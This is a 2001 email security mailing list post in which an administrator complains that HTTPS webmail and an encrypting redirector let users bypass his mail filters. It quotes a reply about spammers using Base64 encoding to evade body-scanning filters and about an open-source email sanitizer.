[Esa-l] Base64 encoded pages

Karl Dunn Karl.Dunn at vmic.com
Wed Feb 7 10:07:13 PST 2001


Encrypted mail via a browser and a http server that is a front end for
mail is *indeed* a security problem.  Encrypted http is a problem.  Maybe
Bjarni is right: encryption is the problem.

We use John's filter on gateways (sendmail relay hosts) for incoming and
outgoing mail.  Web access is through a packet-filtering firewall that
uses the TIS toolkit's proxies for telnet, ftp, and http.

If a luser on the inside uses a browser to look at a personal account
outside:

  1. None of the traffic is mail (it doesn't go through our filters or
relays); it's HTTP.

  2. The "webmail" sites I have noticed our lusers using use https.

These mean that not only are we not filtering anything, but we can't, even
if we somehow modify the TIS http proxy to filter traffic: it's strongly
encrypted from one end to the other.  The blasted luser can send or
receive any attachment at all.

I tried blocking the sites I knew about by telling the TIS http proxy not
to allow them.  That stopped it for all of a day or two, until several
lusers found a work-around and passed the word: they go to safeweb.com (a
free encrypting redirector like anonymizer.com), and get to the webmail
sites that way.  I tried blocking that, and one of the VPs complained, so
the IT director had me unblock safeweb.  He thinks the honor system will
work, but our logs still show a lot of traffic through safeweb, and a
really terrific volume of https (about a gigabyte each day to/from only
about 170 lusers).

I think we should block webmail sites as we find them, and block https
altogether, but I got outranked.  Purchasing and accounting have
legitimate uses for https, but for only a few sites, none of which provide
"mail service", so I could block everything but those.  Outvoted again.

The hole is getting wider every day.

At least John's filter is keeping the lusers from mailing the worms they
download out of here, so any legal liability we might incur is as
minimized as I can make it.  They can still "mail" bad stuff out through
the browsers, however.

This is a *serious* problem.  I don't see how to defend against it, except
by blocking https, and blocking "webmail" sites that use plain old http as
I find them.

I sure would like to hear some better ideas!

Karl Dunn     (KLD13)
VMIC
12090 South Memorial Parkway
Huntsville AL USA 35803
VOICE: (256) 382-8211 or (800) 322-3616
FAX:   (256) 650-5472 or (256) 882-0859

On Wed, 7 Feb 2001, Bjarni R. Einarsson wrote:

> On 2001-02-07, 08:57:01 (-0200), Andre Kajita - Administrador da Rede wrote:
> >
> > Then I nearly fell off my chair, the damn spammer encoded the page and
> > my Netscape Mailer (4.7 though I also use Mozilla) decoded and parsed
> > the HTML.
>
> As it should... :)
>
> This is only to be expected - as more and more people deply
> simple filters which only scan the undecoded message body for
> crap, the spammers and virus writers will respond by encoding
> their messages as Base64 or Quoted-Printable since that will
> allow them to slip by the filters while remaining perfectly
> legible for the recipient.
>
> Just imagine how much fun we're going to have when crypto is the
> norm and not the exception for email...  I'm beginning to
> consider encryption of email as a security *risk*, since it
> implies that all security analysis of content will have to take
> place on the recipient's machine instead of at a central point as
> implemented by John's (and my) sanitizer.  Signed mail is fine,
> but encrypted mail is going to cause a whole slew of new
> problems.
>
> > I don't know if anyone else has had this problem - if it really is a
> > problem - but this is a first for me.  Is there any way to stop this
> > type of trash from coming in (and tracking with webbugs or Javascript
> > code)?
>
> If I recall correctly, this is on John's TODO list.  He
> explicitly mentioned it in his last release's changelog anyway
> (mentioned that it needed to be fixed, that is).
>
> My sanitizer (http://mailtools.anomy.net/) will sanitize the
> contents of base64-, uu- or quoted-printable-encoded attachments
> (remove javascript & other active HTML code), but it won't do the
> web-bug cleanup you're looking for.
>
> --
> Bjarni R. Einarsson                           PGP: 02764305, B7A3AB89
>  bre at klaki.net                -><-              http://bre.klaki.net/
>
> Check out my open-source email sanitizer: http://mailtools.anomy.net/
> _______________________________________________
> E-mail Security Announce list mailing list
> E-mail Security Announce list at spconnect.com
> http://www.spconnect.com/mailman/listinfo/esa-l
>




More information about the esd-l mailing list